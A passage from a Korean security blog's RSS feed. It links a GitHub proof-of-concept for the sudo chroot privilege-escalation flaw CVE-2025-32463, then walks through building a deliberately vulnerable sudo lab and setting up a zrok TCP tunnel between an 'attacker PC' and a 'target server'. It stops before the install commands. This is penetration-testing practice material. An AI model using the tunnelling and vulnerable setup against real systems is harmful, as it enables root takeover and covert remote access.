&lt;/a&gt;&lt;/figure&gt;
&lt;figure id=&quot;og_1753776612107&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;Sudo 로컬 권한 상승 취약점 (CVE-2025-32462, CVE-2025-32463)&quot; data-og-description=&quot;1. Sudo- 사용자에게 슈퍼유저나 다른 사용자의 권한으로 명령어를 실행할 수 있게 해주는 명령어- &amp;quot;sudo [명령어]&amp;quot; 형식으로 쓰이며, 해당 명령을 일시적으로 높은 권한으로 수행- sudo를 사용할 때 &quot; data-og-host=&quot;ggonmerr.tistory.com&quot; data-og-source-url=&quot;https://ggonmerr.tistory.com/627&quot; data-og-url=&quot;https://ggonmerr.tistory.com/627&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/OkTgs/hyZqRWsRNL/TPKgtFWpnZ2gIvqokgmy61/img.png?width=800&amp;amp;height=260&amp;amp;face=0_0_800_260,https://scrap.kakaocdn.net/dn/rrrCj/hyZqOrS31Z/TIlk1yDIC7B01uOMcdeQlK/img.png?width=800&amp;amp;height=260&amp;amp;face=0_0_800_260,https://scrap.kakaocdn.net/dn/LXNkW/hyZqYBgfTh/jdRLdh8l8PS1rc3q9r1Kc1/img.png?width=1271&amp;amp;height=666&amp;amp;face=0_0_1271_666&quot;&gt;&lt;a href=&quot;https://ggonmerr.tistory.com/627&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://ggonmerr.tistory.com/627&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/OkTgs/hyZqRWsRNL/TPKgtFWpnZ2gIvqokgmy61/img.png?width=800&amp;amp;height=260&amp;amp;face=0_0_800_260,https://scrap.kakaocdn.net/dn/rrrCj/hyZqOrS31Z/TIlk1yDIC7B01uOMcdeQlK/img.png?width=800&amp;amp;height=260&amp;amp;face=0_0_800_260,https://scrap.kakaocdn.net/dn/LXNkW/hyZqYBgfTh/jdRLdh8l8PS1rc3q9r1Kc1/img.png?width=1271&amp;amp;height=666&amp;amp;face=0_0_1271_666');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;Sudo 로컬 권한 상승 취약점 (CVE-2025-32462, CVE-2025-32463)&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;1. Sudo- 사용자에게 슈퍼유저나 다른 사용자의 권한으로 명령어를 실행할 수 있게 해주는 명령어- &quot;sudo [명령어]&quot; 형식으로 쓰이며, 해당 명령을 일시적으로 높은 권한으로 수행- sudo를 사용할 때&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;ggonmerr.tistory.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;PoC 코드:&lt;/p&gt;
&lt;figure id=&quot;og_1753850234621&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;object&quot; data-og-title=&quot;GitHub - KaiHT-Ladiant/CVE-2025-32463: CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit&quot; data-og-description=&quot;CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit - KaiHT-Ladiant/CVE-2025-32463&quot; data-og-host=&quot;github.com&quot; data-og-source-url=&quot;https://github.com/KaiHT-Ladiant/CVE-2025-32463&quot; data-og-url=&quot;https://github.com/KaiHT-Ladiant/CVE-2025-32463&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/Che0h/hyZrz9dByA/sQ5qtMAkzWpQ30gHu79S6K/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/b1rYRw/hyZqRoPUqR/3gfQSIovZeUwBdgYgS8PoK/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600&quot;&gt;&lt;a href=&quot;https://github.com/KaiHT-Ladiant/CVE-2025-32463&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://github.com/KaiHT-Ladiant/CVE-2025-32463&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/Che0h/hyZrz9dByA/sQ5qtMAkzWpQ30gHu79S6K/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600,https://scrap.kakaocdn.net/dn/b1rYRw/hyZqRoPUqR/3gfQSIovZeUwBdgYgS8PoK/img.png?width=1200&amp;amp;height=600&amp;amp;face=0_0_1200_600');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;GitHub - KaiHT-Ladiant/CVE-2025-32463: CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit - KaiHT-Ladiant/CVE-2025-32463&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;github.com&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;</description>
      <category>CVE Analyze/CVE-2025-32463</category>
      <category>CVE-2025-32462</category>
      <category>CVE-2025-32462 PoC</category>
      <category>CVE-2025-32462 원인분석</category>
      <category>Sudo root</category>
      <category>Sudo root vulnerable</category>
      <category>sudo root 취약점</category>
      <category>sudo 권한 상승 취약점</category>
      <author>Kai_HT</author>
      <guid isPermaLink="true">https://kaisec.tistory.com/82</guid>
      <comments>https://kaisec.tistory.com/entry/CVE-2025-32463#entry82comment</comments>
      <pubDate>Tue, 29 Jul 2025 17:25:30 +0900</pubDate>
    </item>
    <item>
      <title>CVE-2025-32463 - Vulnerable App Settings</title>
      <link>https://kaisec.tistory.com/entry/CVE-2025-32463-Vulnerable-App-Settings</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1244&quot; data-origin-height=&quot;933&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wcy7e/btsPz0Xog3r/jBUTALe02xyX8SGxLuqOV0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wcy7e/btsPz0Xog3r/jBUTALe02xyX8SGxLuqOV0/img.png&quot; data-alt=&quot;https://medium.com/@yash9439/microsoft-introduces-sudo-command-to-windows-11-bae5b4c491d2&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wcy7e/btsPz0Xog3r/jBUTALe02xyX8SGxLuqOV0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fwcy7e%2FbtsPz0Xog3r%2FjBUTALe02xyX8SGxLuqOV0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1244&quot; height=&quot;933&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;1244&quot; data-origin-height=&quot;933&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;https://medium.com/@yash9439/microsoft-introduces-sudo-command-to-windows-11-bae5b4c491d2&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;br /&gt;취약점 CVE-2025-32463 에 대한 실습을 하기 위한 환경세팅 방법을 정리한 글이다.&lt;br /&gt;해당 취약점에 대한 정리에 대해 서술한 글의 경우, 아래 글을 참고하도록 하자.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 취약점의 경우, 모의해킹이나 블랙박스, RED 팀 등에서 유용하게 사용할 수 있을 것이라 판단되었고 그에 따른 임의 시나리오를 위한 환경 구성을 위해 환경 구성관련 게시글을 작성하였다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;해당 게시글은 환경 세팅에 대한 게시글이므로 CVE 실습 상세내역은 이후 작성되는 다음 게시글을 확인하자.&lt;/p&gt;
&lt;figure id=&quot;og_1753777598197&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;CVE-2025-32463&quot; data-og-description=&quot;지난 6월 30일 sudo 패키지 관련 취약점이 발표되었다. 해당 취약점은 sudo 버전 1.9.17 이전 버전에서 --chroot 옵션을 악용하여 일반 사용자가 루트 권한을 탈취할 수 있는 보안 결함이다.sudo 패키지에&quot; data-og-host=&quot;tistory.kaiht.kr&quot; data-og-source-url=&quot;https://tistory.kaiht.kr/entry/CVE-2025-32463&quot; data-og-url=&quot;https://tistory.kaiht.kr/entry/CVE-2025-32463&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/cpGcj9/hyZrtuctTx/KL3j2ohTnDhNpN0BOVrkK0/img.png?width=800&amp;amp;height=533&amp;amp;face=0_0_800_533,https://scrap.kakaocdn.net/dn/bYErsx/hyZq06W2iV/NO5TemSDabH2ySEQo7env1/img.png?width=800&amp;amp;height=533&amp;amp;face=0_0_800_533,https://scrap.kakaocdn.net/dn/H7H7G/hyZq15RuvY/XSfaGOh67pbiK5KwMQH850/img.png?width=1536&amp;amp;height=1024&amp;amp;face=0_0_1536_1024&quot;&gt;&lt;a href=&quot;https://tistory.kaiht.kr/entry/CVE-2025-32463&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://tistory.kaiht.kr/entry/CVE-2025-32463&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/cpGcj9/hyZrtuctTx/KL3j2ohTnDhNpN0BOVrkK0/img.png?width=800&amp;amp;height=533&amp;amp;face=0_0_800_533,https://scrap.kakaocdn.net/dn/bYErsx/hyZq06W2iV/NO5TemSDabH2ySEQo7env1/img.png?width=800&amp;amp;height=533&amp;amp;face=0_0_800_533,https://scrap.kakaocdn.net/dn/H7H7G/hyZq15RuvY/XSfaGOh67pbiK5KwMQH850/img.png?width=1536&amp;amp;height=1024&amp;amp;face=0_0_1536_1024');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;CVE-2025-32463&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;지난 6월 30일 sudo 패키지 관련 취약점이 발표되었다. 해당 취약점은 sudo 버전 1.9.17 이전 버전에서 --chroot 옵션을 악용하여 일반 사용자가 루트 권한을 탈취할 수 있는 보안 결함이다.sudo 패키지에&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;tistory.kaiht.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style7&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;본 취약점 실습 환경은 본인이 모의해킹 컨설턴트 시작에 앞서 임의 모의해킹 연습을 위해 작성한 게시판 페이지 서버를 이용하였다.&lt;br /&gt;해당 서버는 보다 쾌적한 웹 서버 운영을 위하여 컨테이너 환경으로 구성하였으며, 해당 서버 내 (컨테이너 환경)에서 필요한 것이 부가적으로 요구되어 작성하였다. 일반 리눅스 서버라면 &lt;b&gt;#2 스텝&lt;/b&gt;부터 수행하면된다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style8&quot; /&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;i&gt;본인의 경우 실습 웹 게시판 서버가 존재하여 해당 서버 내에서 패키지 설정에 관련된 것만 다룬다.&lt;br /&gt;&lt;b&gt;특정 리눅스 버전에서 해당 취약점이 안되는 경우가 존재&lt;/b&gt;하므로 확인이 필요하다.&lt;/i&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;&lt;i&gt;- 웹 게시판 서비스는 본인이 만들든가 하자.&lt;/i&gt;&lt;/p&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;1. 피해 대상 서버 내 sudo 설치 여부 확인&lt;/b&gt;&lt;/h4&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Emjoi/btsPBHDdD3I/YschaLN03gBNDHHKhJlTX0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Emjoi/btsPBHDdD3I/YschaLN03gBNDHHKhJlTX0/img.png&quot; data-alt=&quot;sudo --version&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Emjoi/btsPBHDdD3I/YschaLN03gBNDHHKhJlTX0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FEmjoi%2FbtsPBHDdD3I%2FYschaLN03gBNDHHKhJlTX0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;sudo --version&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;본 취약점은 당연하게도&amp;nbsp;&lt;b&gt;sudo 구조 상의 취약점&amp;nbsp;&lt;/b&gt;이므로 sudo가 설치되어있어야 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;일반적인 컨테이너에는 sudo 나 추가 패키지가 없는 경우가 존재하여 설치해주어야한다.&lt;/p&gt;
&lt;h4 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;2. 패키지 설치 준비&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;본 CVE에서 사용되는 sudo 버전은 다음과 같다.&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 100%;&quot;&gt;1.9.14 ~ 1.9.17p1&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;각 서버마다 지원되는 버전이 다를 수 있으므로 확인이 필요하다.&lt;br /&gt;본인의 경우 공식 소스를 다운로드 받아 직접 컴파일을 수행하였다. - &lt;s&gt;본 서버에서 apt install sudo==1.9.14 가 안되어서 강제로 했다.&lt;/s&gt;&lt;br /&gt;&amp;nbsp; - 물론 wget 등 패키지는 본인이 알아서 받아야한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/by9jCj/btsPBICafvl/EA4hRFA3KONX2bkqou1k9k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/by9jCj/btsPBICafvl/EA4hRFA3KONX2bkqou1k9k/img.png&quot; data-alt=&quot;apt install wget&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/by9jCj/btsPBICafvl/EA4hRFA3KONX2bkqou1k9k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fby9jCj%2FbtsPBICafvl%2FEA4hRFA3KONX2bkqou1k9k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;apt install wget&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;wget 으로 소스코드를 받아야되기도 하니 우선 받아주자.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이후 소스코드 컴파일을 위한 gcc도 받아야한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ci5Vki/btsPCKFZTqa/moSXRzmsdpzSneXqdKKRsk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ci5Vki/btsPCKFZTqa/moSXRzmsdpzSneXqdKKRsk/img.png&quot; data-alt=&quot;apt install gcc&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ci5Vki/btsPCKFZTqa/moSXRzmsdpzSneXqdKKRsk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fci5Vki%2FbtsPCKFZTqa%2FmoSXRzmsdpzSneXqdKKRsk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;apt install gcc&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;+ 본인의 경우 실습 환경에서 포트포워딩 설정 제안이 있어 임의 네트워크 연결을 위해 중계 서버를 설정하였다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;중계서버 zrok 설정 방법 -&lt;/p&gt;
&lt;div data-ke-type=&quot;moreLess&quot; data-text-more=&quot;더보기&quot; data-text-less=&quot;닫기&quot;&gt;&lt;a class=&quot;btn-toggle-moreless&quot;&gt;더보기&lt;/a&gt;
&lt;div class=&quot;moreless-content&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wxufO/btsPCK0Zp5c/GnpfKkWDGkFQGW8KSzeks1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wxufO/btsPCK0Zp5c/GnpfKkWDGkFQGW8KSzeks1/img.png&quot; data-alt=&quot;공격자 PC: zrok enable [zrok계정_해시값]&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wxufO/btsPCK0Zp5c/GnpfKkWDGkFQGW8KSzeks1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwxufO%2FbtsPCK0Zp5c%2FGnpfKkWDGkFQGW8KSzeks1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격자 PC: zrok enable [zrok계정_해시값]&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/CE3Rw/btsPBEHdpou/3wr9LJO0DnOBD5RhJPvFj1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/CE3Rw/btsPBEHdpou/3wr9LJO0DnOBD5RhJPvFj1/img.png&quot; data-alt=&quot;공격 대상 서버: zrok enable [zrok계정_해시값]&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/CE3Rw/btsPBEHdpou/3wr9LJO0DnOBD5RhJPvFj1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FCE3Rw%2FbtsPBEHdpou%2F3wr9LJO0DnOBD5RhJPvFj1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상 서버: zrok enable [zrok계정_해시값]&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dmEChl/btsPCj3C28B/5D5Zml9rKTXzYGzO7Rwxj1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dmEChl/btsPCj3C28B/5D5Zml9rKTXzYGzO7Rwxj1/img.png&quot; data-alt=&quot;zrok 중계 서버를 이용한 네트워크 연결 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dmEChl/btsPCj3C28B/5D5Zml9rKTXzYGzO7Rwxj1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdmEChl%2FbtsPCj3C28B%2F5D5Zml9rKTXzYGzO7Rwxj1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1238&quot; height=&quot;916&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;zrok 중계 서버를 이용한 네트워크 연결 확인&lt;/figcaption&gt;
&lt;/figure&gt;

&lt;p data-ke-size=&quot;size16&quot;&gt;중계서버 서비스인 zrok 회원 가입 이후, 발급된 zrok 캐시 값을 이용하여 공격자 및 공격 대상 서버 내 네트워크 연결을 수행한다.&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/yGBeB/btsPC4LEG2J/kBjcKiQ8hE0vv3ZB8bVhok/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/yGBeB/btsPC4LEG2J/kBjcKiQ8hE0vv3ZB8bVhok/img.png&quot; data-alt=&quot;tcp 터널링을 위한 zrok private 네트워크 연결 임의 외부포트 444사용: zrok share private --backend-mode tcpTunnel &amp;quot;127.0.0.1:4444&amp;quot;&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/yGBeB/btsPC4LEG2J/kBjcKiQ8hE0vv3ZB8bVhok/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FyGBeB%2FbtsPC4LEG2J%2FkBjcKiQ8hE0vv3ZB8bVhok%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;tcp 터널링을 위한 zrok private 네트워크 연결 임의 외부포트 444사용: zrok share private --backend-mode tcpTunnel &quot;127.0.0.1:4444&quot;&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bNzoGc/btsPBIbKmG6/4m0Q4Iv0X8RMpV20xbFxA1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bNzoGc/btsPBIbKmG6/4m0Q4Iv0X8RMpV20xbFxA1/img.png&quot; data-alt=&quot;공격 대상 서버의 tcp 터널링을 위한 zrok 중계 서버 연결. zrok access private [네트워크 해시]&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bNzoGc/btsPBIbKmG6/4m0Q4Iv0X8RMpV20xbFxA1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbNzoGc%2FbtsPBIbKmG6%2F4m0Q4Iv0X8RMpV20xbFxA1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1115&quot; height=&quot;628&quot; data-origin-width=&quot;1115&quot; data-origin-height=&quot;628&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상 서버의 tcp 터널링을 위한 zrok 중계 서버 연결. zrok access private [네트워크 해시]&lt;/figcaption&gt;
&lt;/figure&gt;

&lt;p data-ke-size=&quot;size16&quot;&gt;해당 터널링 이후 공격 대상 서버와 공격지의 TcpTunneling 여부를 확인한다.&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/AYfmv/btsPDEyYVs2/KwWgOnGOI9ew25QkucCqnK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/AYfmv/btsPDEyYVs2/KwWgOnGOI9ew25QkucCqnK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/AYfmv/btsPDEyYVs2/KwWgOnGOI9ew25QkucCqnK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FAYfmv%2FbtsPDEyYVs2%2FKwWgOnGOI9ew25QkucCqnK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1238&quot; height=&quot;916&quot; data-origin-width=&quot;1238&quot; data-origin-height=&quot;916&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;

&lt;p data-ke-size=&quot;size16&quot;&gt;Tcp 터널링으로 공격지에서는 localhost 의 4444 포트로, 공격 대상 서버의 경우 localhost 9191 포트로 연결이 가능하다.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;두 패키지 설치가 끝났다면, sudo 설치할 준비가 모두 완료된다.&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h4 style=&quot;color: #000000; text-align: start;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;3. 서버 내 CVE 에 취약한 sudo 설치&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size14&quot;&gt;요구되는 패키지가 모두 설치되었다면 다음 명령어를 이용하여 패키지 설치를 수행하면된다.&lt;/p&gt;
